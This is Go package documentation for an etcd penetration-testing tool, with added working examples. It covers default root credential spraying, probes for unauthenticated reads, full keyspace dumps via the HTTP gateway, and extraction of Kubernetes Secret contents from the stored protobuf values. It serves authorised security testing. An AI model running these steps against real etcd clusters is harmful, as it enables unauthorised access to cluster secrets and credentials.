Documentation
Index
- Variables
- func ConnectEtcdPublic(ctx context.Context, target, username, password string, timeoutMs int) (bool, string, error)
- func NormalizeTarget(raw string) string
- func PerformAuth(ctx context.Context, target string, config *etcdfern.PentestEtcdConfig) (*pentestfern.AuthResult, error)
- func PerformDump(ctx context.Context, target, token string, config *etcdfern.PentestEtcdConfig) (*etcdfern.EtcdDumpResult, error)
- func PerformK8sDecode(ctx context.Context, target string, dumpResult *etcdfern.EtcdDumpResult, ...) (*etcdfern.EtcdK8SDecodeResult, error)
- func PerformProbe(ctx context.Context, target string, config *etcdfern.PentestEtcdConfig) (*etcdfern.EtcdProbeResult, error)
- func PerformReadUnauth(ctx context.Context, target string, config *etcdfern.PentestEtcdConfig) (*etcdfern.EtcdReadResult, error)
- func RunPentest(ctx context.Context, config *etcdfern.PentestEtcdConfig) (*etcdfern.PentestEtcdReport, error)
- type Target
Constants
This section is empty.
Variables
var DefaultCredentials = []struct{ User, Pass string }{
{"root", "root"},
{"root", "etcd"},
{"root", ""},
{"root", "password"},
{"root", "admin"},
{"etcd", "etcd"},
}
DefaultCredentials contains the most common lazy etcd root passwords. etcd auth is opt-in: a cluster answers every request until auth is enabled, and enabling it requires a root user to exist first. The root role is the only one with unrestricted access to the whole keyspace and to the auth and cluster-admin APIs, so guessing root's password yields the entire store and control of the auth configuration.
Functions
func ConnectEtcdPublic
func ConnectEtcdPublic(ctx context.Context, target, username, password string, timeoutMs int) (bool, string, error)
ConnectEtcdPublic makes a single authentication attempt with the given username and password against target, bounded by timeoutMs, and returns (success, message, err) in the shape the credential-spray integration expects.
func NormalizeTarget
func NormalizeTarget(raw string) string
NormalizeTarget parses a raw target string and returns the canonical host:port form (see ParseTarget and FormatTarget). If parsing fails, the raw string is returned unchanged, so callers cannot rely on the result being well-formed.
func PerformAuth
func PerformAuth(ctx context.Context, target string, config *etcdfern.PentestEtcdConfig) (*pentestfern.AuthResult, error)
PerformAuth tries each username+password pair against the etcd gateway's authenticate endpoint (POST /v3/auth/authenticate) and captures the token returned on success for the later phases. The token is a JWT only when the server runs with --auth-token=jwt; the default is an opaque simple token, which etcd expires after --auth-token-ttl seconds (300 by default), so a token captured early in a long spray may need refreshing before the dump.
func PerformDump
func PerformDump(ctx context.Context, target, token string, config *etcdfern.PentestEtcdConfig) (*etcdfern.EtcdDumpResult, error)
PerformDump performs a paginated keyspace dump via POST /v3/kv/range; key, range_end and value are base64 strings on the wire, because the gateway JSON-encodes protobuf bytes fields. If token is non-empty, it is sent as a Bearer token (authenticated dump); otherwise the dump relies on the server accepting unauthenticated reads.
func PerformK8sDecode
func PerformK8sDecode(ctx context.Context, target string, dumpResult *etcdfern.EtcdDumpResult, config *etcdfern.PentestEtcdConfig) (*etcdfern.EtcdK8SDecodeResult, error)
PerformK8sDecode decodes Kubernetes-encoded etcd entries. The API server stores objects (under /registry/ by default) with a four-byte "k8s\x00" magic prefix followed by a protobuf-encoded runtime.Unknown wrapper: its typeMeta carries apiVersion and kind, and its raw field holds the object itself, still protobuf-encoded. This function extracts readable fields from that payload using key path parsing (/registry/<resource>/<namespace>/<name>) and heuristic string extraction rather than the full API type definitions. Values that start with "k8s:enc:" are encrypted at rest and cannot be decoded this way. It is only called when K8S_DECODE is in the requested action list; the DecodeKubernetesSecrets config field records whether the operator explicitly opted in via --decode-kubernetes-secrets, for reporting purposes only, since the decode always runs once this function is invoked.
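As an added illustration of the wrapper described above (example code written for this page, not part of the package): a minimal protobuf field walker that checks the "k8s\x00" magic, reads apiVersion and kind out of the runtime.Unknown typeMeta, returns the still-encoded raw object, and runs the printable-string heuristic over it. Field numbers follow runtime.Unknown in k8s.io/apimachinery (typeMeta=1, raw=2, contentEncoding=3, contentType=4) and its TypeMeta (apiVersion=1, kind=2); the sample value is constructed inside the block in the shape of a core/v1 Secret and is not a capture from a real cluster. The "k8s:enc:" check covers encryption at rest, where this approach can recover nothing.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
	"regexp"
)

// Serializer magic prefix, and the prefix of values encrypted at rest (k8s:enc:<provider>:v1:<keyname>:...).
var protoMagic, encryptedPrefix = []byte("k8s\x00"), []byte("k8s:enc:")

// walk calls fn for each field of one protobuf message (wire types 0, 1, 2 and 5; groups are rejected).
// val is the field payload, or the varint's own bytes for wire type 0.
func walk(b []byte, fn func(num, wire int, val []byte) error) error {
	for len(b) > 0 {
		tag, n := binary.Uvarint(b)
		if n <= 0 {
			return errors.New("malformed tag")
		}
		num, wire, size := int(tag>>3), int(tag&7), 0
		b = b[n:]
		switch wire {
		case 0:
			_, size = binary.Uvarint(b) // 0 or negative means a malformed varint
		case 1, 5:
			size = 9 - wire // fixed64 is 8 bytes, fixed32 is 4
		case 2:
			l, m := binary.Uvarint(b)
			if m <= 0 || l > uint64(len(b)-m) {
				return errors.New("length-delimited field overruns value")
			}
			size, b = int(l), b[m:]
		default:
			return fmt.Errorf("unsupported wire type %d", wire)
		}
		if size > len(b) || (wire == 0 && size <= 0) {
			return errors.New("truncated field")
		}
		if err := fn(num, wire, b[:size]); err != nil {
			return err
		}
		b = b[size:]
	}
	return nil
}

// DecodeUnknown checks the magic prefix and reads runtime.Unknown (typeMeta=1 {apiVersion=1, kind=2},
// raw=2, contentEncoding=3, contentType=4); raw is the object itself, still protobuf-encoded.
func DecodeUnknown(v []byte) (apiVersion, kind string, raw []byte, err error) {
	if bytes.HasPrefix(v, encryptedPrefix) {
		return "", "", nil, errors.New("value is encrypted at rest; only the API server's provider key opens it")
	}
	if !bytes.HasPrefix(v, protoMagic) {
		return "", "", nil, errors.New("no k8s protobuf magic (JSON storage or a non-Kubernetes value)")
	}
	err = walk(v[len(protoMagic):], func(num, wire int, val []byte) error {
		if wire == 2 && num == 2 {
			raw = val
		} else if wire == 2 && num == 1 {
			return walk(val, func(n, w int, s []byte) error {
				if w == 2 && n == 1 {
					apiVersion = string(s)
				} else if w == 2 && n == 2 {
					kind = string(s)
				}
				return nil
			})
		}
		return nil
	})
	if err != nil {
		return "", "", nil, err
	}
	return apiVersion, kind, raw, nil
}

// PrintableStrings is the heuristic pass over raw: runs of at least four printable ASCII bytes.
func PrintableStrings(raw []byte) []string {
	var out []string
	for _, m := range regexp.MustCompile(`[ -~]{4,}`).FindAll(raw, -1) {
		out = append(out, string(m))
	}
	return out
}

// tagLen encodes one length-delimited field; it exists only to build the constructed sample below.
func tagLen(num int, payload []byte) []byte {
	var buf [binary.MaxVarintLen64]byte
	out := append([]byte{byte(num<<3 | 2)}, buf[:binary.PutUvarint(buf[:], uint64(len(payload)))]...)
	return append(out, payload...)
}

// SampleSecretValue is a constructed value laid out like a core/v1 Secret (metadata=1 {name=1,
// namespace=3}, data=2 map entries {key=1, value=2}, type=3) inside an Unknown wrapper; not a real capture.
func SampleSecretValue() []byte {
	obj := tagLen(1, append(tagLen(1, []byte("db-credentials")), tagLen(3, []byte("default"))...))
	obj = append(obj, tagLen(2, append(tagLen(1, []byte("password")), tagLen(2, []byte("s3cr3t"))...))...)
	obj = append(obj, tagLen(3, []byte("Opaque"))...)
	unk := append(tagLen(1, append(tagLen(1, []byte("v1")), tagLen(2, []byte("Secret"))...)), tagLen(2, obj)...)
	return append(append([]byte{}, protoMagic...), unk...)
}

func main() {
	apiVersion, kind, raw, err := DecodeUnknown(SampleSecretValue())
	fmt.Println(apiVersion, kind, PrintableStrings(raw), err)
}
```

The walker deliberately does not know the Secret's own .proto: the strings it surfaces (name, namespace, data keys and values, type) fall out of the heuristic because every length prefix and tag byte in the sample is below 0x20, which is also why the heuristic works reasonably on real objects whose interesting fields are short ASCII. Map-typed data whose values are binary will not surface the same way.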
func PerformProbe
func PerformProbe(ctx context.Context, target string, config *etcdfern.PentestEtcdConfig) (*etcdfern.EtcdProbeResult, error)
PerformProbe retrieves server/cluster version, member list, and k8s inference via the etcd HTTP gateway.
func PerformReadUnauth
func PerformReadUnauth(ctx context.Context, target string, config *etcdfern.PentestEtcdConfig) (*etcdfern.EtcdReadResult, error)
PerformReadUnauth checks whether etcd allows unauthenticated key enumeration via the canonical "count all keys" probe: POST /v3/kv/range with key="\x00", range_end="\x00" and count_only=true. Both bytes fields are sent base64-encoded ("AA==") because the gateway JSON-encodes protobuf bytes, and a range_end of "\x00" means "to the end of the keyspace", so the request covers every key but returns only the count. A count in the response rather than an authentication error means the whole store can be read without credentials.
func RunPentest
func RunPentest(ctx context.Context, config *etcdfern.PentestEtcdConfig) (*etcdfern.PentestEtcdReport, error)
RunPentest performs etcd pentest operations in phases, PROBE (always) -> READ_UNAUTH -> AUTH -> DUMP -> K8S_DECODE, running only the phases named in the requested actions. Later phases consume the output of earlier ones: DUMP takes the token captured by AUTH and K8S_DECODE works on the dump result. ClusterEndpoints in the config are appended as additional targets (deduped).
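The READ_UNAUTH, AUTH and DUMP phases end to end, as an added example (not the package's own code) against a constructed in-memory stand-in for the gateway; HTTPGateway is the same call shape over real HTTP. The wire details it exercises: bytes fields are base64, the gateway's int64 fields come back as JSON strings, the auth token goes in the Authorization header as-is, and pagination continues from the last returned key plus a 0x00 byte. The Gateway type, the token value, the key names and the store contents are all the example's own.

```go
package main

import (
	"bytes"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"net/http"
	"sort"
)

// Gateway posts a JSON body to one etcd v3 gateway path with an optional auth token and decodes the reply.
type Gateway func(path, token string, in, out interface{}) error

// Gateway JSON shapes: protobuf bytes fields (key, range_end, value) travel base64-encoded and
// int64 fields (limit, count) as JSON strings, per the proto3 JSON mapping the gateway uses.
type rangeRequest struct {
	Key       string `json:"key"`
	RangeEnd  string `json:"range_end,omitempty"`
	Limit     int64  `json:"limit,omitempty,string"`
	CountOnly bool   `json:"count_only,omitempty"`
}
type rangeResponse struct {
	Kvs   []map[string]string `json:"kvs"`
	More  bool                `json:"more"`
	Count int64               `json:"count,string"`
}

var b64 = base64.StdEncoding.EncodeToString
var zeroKey = b64([]byte{0}) // "\x00" as both key and range_end spans the whole keyspace

// HTTPGateway is the real transport: etcd reads the raw token from the Authorization header.
func HTTPGateway(c *http.Client, base string) Gateway {
	return func(path, token string, in, out interface{}) error {
		body, _ := json.Marshal(in)
		req, _ := http.NewRequest(http.MethodPost, base+path, bytes.NewReader(body))
		if token != "" {
			req.Header.Set("Authorization", token)
		}
		resp, err := c.Do(req)
		if err != nil {
			return err
		}
		defer resp.Body.Close()
		if resp.StatusCode != http.StatusOK {
			return fmt.Errorf("%s: %s", path, resp.Status)
		}
		return json.NewDecoder(resp.Body).Decode(out)
	}
}

// CountAllKeys is the READ_UNAUTH probe when token is ""; a count back means reads need no credentials.
func CountAllKeys(g Gateway, token string) (int64, error) {
	var out rangeResponse
	err := g("/v3/kv/range", token, rangeRequest{Key: zeroKey, RangeEnd: zeroKey, CountOnly: true}, &out)
	return out.Count, err
}

// Authenticate is the AUTH phase for one credential pair.
func Authenticate(g Gateway, name, password string) (string, error) {
	var out map[string]string
	err := g("/v3/auth/authenticate", "", map[string]string{"name": name, "password": password}, &out)
	return out["token"], err
}

// DumpAll is the DUMP phase: each page starts at the last key returned plus a 0x00 byte (the smallest
// key that sorts after it) and the loop ends once the server reports more=false.
func DumpAll(g Gateway, token string, pageSize int64) (map[string]string, error) {
	got, start := map[string]string{}, []byte{0}
	for {
		var page rangeResponse
		if err := g("/v3/kv/range", token, rangeRequest{Key: b64(start), RangeEnd: zeroKey, Limit: pageSize}, &page); err != nil {
			return nil, err
		}
		for _, e := range page.Kvs {
			k, _ := base64.StdEncoding.DecodeString(e["key"])
			v, _ := base64.StdEncoding.DecodeString(e["value"])
			got[string(k)] = string(v)
			start = append(append([]byte{}, k...), 0)
		}
		if !page.More || len(page.Kvs) == 0 {
			return got, nil
		}
	}
}

// FakeGateway is a constructed in-memory stand-in for an auth-enabled server (only root/root works)
// so the example runs offline; it round-trips the same JSON shapes but is not etcd.
func FakeGateway(store map[string]string) Gateway {
	keys := make([]string, 0, len(store))
	for k := range store {
		keys = append(keys, k)
	}
	sort.Strings(keys)
	return func(path, token string, in, out interface{}) error {
		body, _ := json.Marshal(in)
		if path == "/v3/auth/authenticate" {
			var creds map[string]string
			json.Unmarshal(body, &creds)
			if creds["name"] != "root" || creds["password"] != "root" {
				return errors.New("400 Bad Request: authentication failed")
			}
			return json.Unmarshal([]byte(`{"token":"constructed-token"}`), out)
		}
		if token != "constructed-token" {
			return errors.New("400 Bad Request: user name is empty")
		}
		var req rangeRequest
		json.Unmarshal(body, &req)
		start, _ := base64.StdEncoding.DecodeString(req.Key)
		i := sort.SearchStrings(keys, string(start))
		resp := rangeResponse{Count: int64(len(keys) - i)}
		for j := i; j < len(keys) && !req.CountOnly; j++ {
			if req.Limit > 0 && int64(len(resp.Kvs)) == req.Limit {
				resp.More = true
				break
			}
			resp.Kvs = append(resp.Kvs, map[string]string{"key": b64([]byte(keys[j])), "value": b64([]byte(store[keys[j]]))})
		}
		reply, _ := json.Marshal(resp)
		return json.Unmarshal(reply, out)
	}
}

func main() {
	g := FakeGateway(map[string]string{"/registry/a": "1", "/registry/b": "2", "/registry/c": "3"})
	tok, _ := Authenticate(g, "root", "root")
	fmt.Println(DumpAll(g, tok, 2))
}
```

Against a live target, HTTPGateway(http.DefaultClient, "http://host:2379") replaces FakeGateway and the three phase functions are unchanged. The count probe is the only request worth sending before credentials are known: with auth enabled the gateway rejects it, and that rejection rather than the count is what tells the AUTH phase it has work to do.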
Types
type Target
Target holds a parsed etcd host:port.
func ParseTarget
ParseTarget parses "host[:port]" into a Target. Accepts IPv4, IPv6 (bare ::1 or bracketed [::1]:port), and plain hostnames. Bare strings with no port are treated as the host with the default etcd port (2379). Uses utils.ParseHostPort so that out-of-range ports (>65535) fall back to the default rather than being accepted as-is.
func (*Target) FormatTarget
FormatTarget returns a canonical "host:port" string using utils.FormatHostPort so that IPv6 addresses are correctly bracketed (e.g. [::1]:2379).
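An added example (not the package's code) of the parsing rules just described, built on net.SplitHostPort and net.JoinHostPort so that IPv6 bracketing and the port fallback behave the way the text specifies; the Target type, the DefaultEtcdPort constant and the NormalizeTarget wrapper here are the example's own, and the inputs in main are constructed.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"strconv"
	"strings"
)

const DefaultEtcdPort = 2379

// Target is a parsed host and port (the example's own type, not the package's).
type Target struct {
	Host string
	Port int
}

// ParseTarget accepts IPv4, IPv6 (bare "::1" or bracketed "[::1]:2380") and hostnames, with or
// without a port. A missing, non-numeric or out-of-range port becomes the default instead of being
// passed through as-is; an empty host is an error.
func ParseTarget(raw string) (Target, error) {
	raw = strings.TrimSpace(raw)
	host, portStr, err := net.SplitHostPort(raw)
	if err != nil {
		// No port at all, or a bare IPv6 literal (SplitHostPort rejects "::1" as "too many colons"):
		// the whole string is the host. Brackets are trimmed so "[::1]" and "::1" agree.
		host, portStr = strings.Trim(raw, "[]"), ""
	}
	if host == "" {
		return Target{}, errors.New("empty host in target " + strconv.Quote(raw))
	}
	port, perr := strconv.Atoi(portStr)
	if perr != nil || port < 1 || port > 65535 {
		port = DefaultEtcdPort
	}
	return Target{Host: host, Port: port}, nil
}

// String returns "host:port", bracketing IPv6 hosts the way net.JoinHostPort does.
func (t Target) String() string {
	return net.JoinHostPort(t.Host, strconv.Itoa(t.Port))
}

// NormalizeTarget returns the canonical form, or the raw input unchanged when it cannot be parsed.
func NormalizeTarget(raw string) string {
	t, err := ParseTarget(raw)
	if err != nil {
		return raw
	}
	return t.String()
}

func main() {
	for _, in := range []string{"10.0.0.5", "10.0.0.5:2380", "::1", "[::1]:2380", "etcd.internal:70000", ""} {
		fmt.Printf("%q -> %q\n", in, NormalizeTarget(in))
	}
}
```

The fallback for an unparseable string is what makes the bare-IPv6 case work: SplitHostPort cannot tell "::1" (an address with no port) from a malformed "a:b:c", so both are treated as a host and given the default port, which is the behaviour the page documents for bare strings.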